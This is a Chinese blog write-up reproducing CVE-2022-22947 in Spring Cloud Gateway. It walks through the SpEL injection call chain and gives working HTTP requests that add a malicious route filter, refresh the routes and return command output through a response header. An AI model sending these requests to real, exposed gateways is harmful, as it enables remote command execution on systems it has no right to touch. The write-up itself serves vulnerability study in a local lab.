Spring Cloud Gateway SPEL RCE复现

最新推荐文章于 2024-06-12 22:24:08 发布
最新推荐文章于 2024-06-12 22:24:08 发布
阅读量1.1k 收藏 3
点赞数 1
文章标签: gateway java spring
原文链接:https://www.tuicool.com/articles/fu6b6z7
版权

目录

0 环境搭建

影响范围:

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway < 3.0.7

p牛的vulhub已经搭好docker了, vulhub/spring/CVE-2022-22947 at master · vulhub/vulhub · GitHub

也可以本地搭建

git clone https://github.com/spring-cloud/spring-cloud-gateway
cd spring-cloud-gateway
git checkout v3.1.0
然后idea打开项目,再调试或启动

1 漏洞触发点

首先找到spring-cloud-gateway的commit记录,看看修改的地方,直接来到https://github.com/spring-cloud/spring-cloud-gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e

如下:

非常标准的spel表达式使用,代码在org/springframework/cloud/gateway/support/ShortcutConfigurable#getValue()方法中,搜索其调用位置

三个枚举调用都位于ShortcutConfigurable内部的枚举类ShortcutType中,且重写了不同的normalize方法,继续向上找ShortcutType#normalize方法的调用

最终都来到 org.springframework.cloud.gateway.support.ConfigurationService$ConfigurableBuilder#normalizeProperties 方法中,并且传入的时该类的properties成员变量,而normalizeProperties()方法的调用只出现在该类的父类AbstractBuilder.bind()中

继续向上寻找bind方法的调用

发现 org.springframework.cloud.gateway.route.RouteDefinitionRouteLocator#loadGatewayFilters 方法中不仅出现了bind方法调用,还出现了properties方法调用,跟进该properties方法可见对properties成员变量的设置,即前述的 org.springframework.cloud.gateway.support.ConfigurationService$ConfigurableBuilder#normalizeProperties 方法中向下调用spel表达式时恰好需要的properties成员变量。

由此即可知道该漏洞的触发可能来自于gatewayFilter的添加,并且从loadGatewayFilters方法继续向上跟踪调用如下:

RouteDefinitionRouteLocator.loadGatewayFilters <- RouteDefinitionRouteLocator.getFilters <- RouteDefinitionRouteLocator.convertToRoute <- RouteDefinitionRouteLocator.getRoutes <- GatewayControllerEndpoint.route

也可以看到确实来自于filter的添加。

所以思路可以出来,由于添加filter时输入了spel表达式,被当作properties进行解析,最终导致恶意表达式被执行,从而实现rce。

再从spring cloud gateway的文档进行查看

文档的11.5中提到,使用POST请求/gateway/routes/id 并使用json格式的数据,可以创建一个route,并且从前面的格式中也可以看到,支持添加filter。

但没有给出filters字段中具体应该怎么写,但没关系,我们从源代码可以找到

org.springframework.cloud.gateway.filter.FilterDefinition 这个filter的定义类中,其成员变量如下

运行程序后,再mappings里面可以看到/routes/{id}这个uri对应的方法

跟进该方法可以看到对filter给进的name有验证

调试模型下可以看到允许的name如下

这里的每种name,实际上又对应了不同的GatewayFilterFactory

其中有个AddResponseHeaderGatewayFilterFactory可以向response hedder中写入执行结果,因此恰好满足回显要求

根据这里的getName和getValue可以知道还需要添加name和value字段

2 构建poc

根据前面的信息,可以逐步汇总出poc的样子,

  • 首先是POST /actuator/gateway/routes/{id}
  • 然后添加json body,其中需要给出id和filters字段
  • 其中filters字段需要给出name和args,而name的值需要设置为AddResponseHeader获得回显,args中需要name和value

最终poc如下

  • post请求创建route和filter
POST /actuator/gateway/routes/test HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "test",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result=",
      "value": "#{new java.util.Scanner(new java.lang.ProcessBuilder('cmd', '/c', 'ping', 'baidu.com').start().getInputStream(), 'GBK').useDelimiter('asfsfsdfsf').next()}"
    }
  }],
   "uri": "http://test.com"
}

  • POST请求/refresh,使新建的uri和filter生效
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

由于前面使用的spel是ping百度的,所以需要等待一会,也可以换成其它命令,比如dir、ipconfig、whoami等

  • GET请求/actuator/gateway/routes/test,触发spel,并得到回显
GET /actuator/gateway/routes/test HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

得到ping命令的输出

  • DELETE请求删除/actuator/gateway/routes/test
GET /actuator/gateway/routes/test HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

3 总结

昨天在twitter上看到了这个rce,没有太注意,昨天晚上看到通报,感觉这个洞还是有价值的,想着今天来复现应该差不多,结果P牛昨天就把docker上传到vulhub了,y4er师傅也写出了分析文章,跟不上啊= =

p牛和y4er师傅用的是spring自带的类处理命令执行的返回字节流,我用的是之前找到的jdk自带方法,其实都差不多

Java面试那些事儿
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-22947 Spring Cloud Gateway SpEL 表达式注入 RCE漏洞复现
afei001
03-05 4836
当启用和暴露 Gateway Actuator 端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
Spring Cloud gateway 三种方式注入内存马(详细过程)
pyth0zn的博客
04-19 1135
1.提交请求包的时候一定要注意类路径要写正确,我有好几次不成功都是没写对2.最好用java 1.8 编译字节码,兼容性比较好,不然会出现服务器版本和本地编译不一致的情况CVE-2022-22947 注入哥斯拉内存马 – Whwlsfb's Tech BlogSpring Cloud Gateway 注入哥斯拉内存马复现 - 国产大熊猫个人空间 - OSCHINA - 中文开源技术交流社区Spring cloud gateway通过SPEL注入内存马 | 回忆飘如雪。
Spring Cloud GateWay SPEL RCE(CVE-2022-22947 )
weixin_43263451的博客
08-15 1566
这个漏洞本质是一个SPEL注入漏洞,需要应用暴漏actuator接口用来动态添加路由当Gateway Actuator端点是启用状态并且是允许访问的以及相关配置不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以利用Actuator动态添加恶意路由,若路由中包括SPEL表达式则在路由刷新时会对其进行解析从而达到SPEL表达式注入本质是一个SPEL表达式注入漏洞,本来是只有在修改路由配置文件的情况下才能导致RCE,但是由于Gateway提供了Actuator。.
Spring Cloud Getway RCE漏洞
最新发布
qq_73630656的博客
06-12 853
Spring Cloud Gateway 启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
问题很多的小明
03-03 1430
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
springcloudgatewayRCE(spEl表达式)
m0_64053653的博客
01-19 752
cloud全家桶Spring表达式语言全称为“Spring Expression Language”,缩写为“SpEL”,类似于Struts2x中使用的OGNL表达式语言,能在运行时构建复杂表达式、存取对象图属性、对象方法调用等等,并且能与Spring功能完美整合,如能用来配置Bean定义。从Spring 3开始引入了Spring表达式语言,它能够以一种强大而简洁的方式将值装配到Bean属性和构造器参数中,在这个过程中所使用的表达式会在运行时计算得到值。
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞复现
Tauil的博客
07-25 888
查看其路由规则,因为这是个靶场,所以肯定是允许你访问的,正经网站肯定是不会给你访问的,打开burpsuite进行放包,我们需要添加一个新的路由到网关,添加新的路由需要用。表达式,所以我们可以选择任一过滤器进行使用,这里使用过滤器。然后使用refresh刷新路由配置,refresh也需要用。,并且可以看到他已经成功执行了我们输入的命令whoami。查看到路由表配置,此时可以看到多出了我们新添加的路由路径。方式提交,而网关最终会将所有的请求交给过滤链表。进行处理,所以我们将待执行的命令放到。...
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947 SpringCloud GateWay SpEL RCE CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpELSpring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的...
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1688
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
开发知识点-分布式微服务技术栈 SpringCloud
aming小老弟
10-19 2660
分布式架构的一种把服务进行 拆分springcloud 解决了 服务拆分过程中的 治理问题与单体应用 进行区分(单体架构 把业务所有功能集中开发,打成一个包部署)每个模块独立开发和部署(服务集群)服务之间互相调用出现分布式技术WebserviceESBHessionDubbo异步通信 消息队列(秒杀)敏捷开发思想高内聚低耦合微服务 + 持续集成。
【Web】CVE-2022-22947 SpringCloud Gateway SpEL漏洞学习
uuzeray的博客
02-18 763
Spring Boot Actuator 是 Spring Boot 提供的一个功能强大的监控和管理端点,可以用于监视应用程序在生产环境中的运行情况。它包括了诸多内置的端点(endpoints),如健康检查、信息展示、环境配置、线程堆栈等,同时也支持自定义的端点来暴露应用程序特定的信息和操作。Spring Cloud GatewaySpring Cloud 生态系统中用于构建 API 网关的组件,它提供了路由、过滤器、负载均衡等功能,用于统一管理和控制微服务架构中的请求流量。关系。
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 7669
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
m0_58596609的博客
10-11 1997
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
qq_43381463的博客
04-19 512
Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
springboot-spel-rce复现
lastwinn的博客
07-04 1066
记录自己的所学以及理解。
Spring Cloud Gateway CVE-2022-22947 poc解析
王嘟嘟的博客
04-19 5522
0x00 前言 在查资料的时候突然发现真的好卷,新漏洞出来没多久,各个大佬就已经写好了分析文章,由于这个漏洞排查产品中不存在,所以就一直犯懒没有去看,终归还是要补回来的。 文章若有言语不妥之处还请见谅。 0x01 环境 环境参考y4er给出的: git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout v3.1.0 #切换分支 参考 https://y4e
SpringBoot SpEL RCE漏洞分析
12-07 1884
SpringBoot SpEL RCE 前言最近一段时间学习Spring系列的漏洞,跟着Github上的资源学习
SpringCloud Gateway SpEL RCE漏洞深度剖析与复现
CVE-2022-22947是针对Spring Cloud Gateway的一个远程代码执行(Remote Code Execution, RCE)漏洞,影响的是该框架中SpELSpring Expression Language)功能。Spring Cloud Gateway是一款用于API网关的轻量级解决...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值